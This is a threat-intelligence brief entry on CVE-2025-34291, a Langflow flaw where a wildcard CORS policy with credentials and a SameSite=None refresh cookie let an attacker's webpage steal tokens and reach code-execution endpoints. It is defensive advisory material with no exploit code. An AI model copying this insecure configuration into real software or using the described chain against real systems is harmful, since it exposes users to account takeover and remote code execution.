CVE-2025-34291 — Langflow AI Workflow Platform: CORS misconfiguration + SameSite=None refresh token enables cross-origin token theft (CISA KEV, ITW, Flodric botnet)
From CTI Daily Brief — 2026-05-22 · published 2026-05-22 · view item permalink →
CVE-2025-34291 (CVSS 4.0: 9.4 / CVSS 3.1: 8.8, CWE-942 Overly Permissive CORS) affects Langflow <= 1.6.9. The platform's default CORS policy (allow_origins='*' with allow_credentials=True) combined with the refresh token cookie configured as SameSite=None allows any malicious webpage to perform cross-origin requests with the authenticated victim's credentials, reaching /api/v1/auth/refresh to obtain access tokens and subsequently calling all authenticated endpoints — including Langflow's code-execution functionality. Exploitation requires only victim browser navigation to an attacker-controlled page; no prior access needed (T1190 Exploit Public-Facing Application). First confirmed exploitation: 2026-01-23; Trend Micro documented Flodric botnet deployment through compromised Langflow instances. CISA added CVE-2025-34291 to KEV on 2026-05-21. Fixed: Langflow 1.7.0 (restrictive CORS default) and 1.9.3 (explicit fix). Block internet exposure of Langflow instances; enforce HTTPS-only with explicit CORS allowlists; hunt for anomalous subprocess execution from the Langflow process tree (Sysmon EID 1, parent langflow-backend or uvicorn).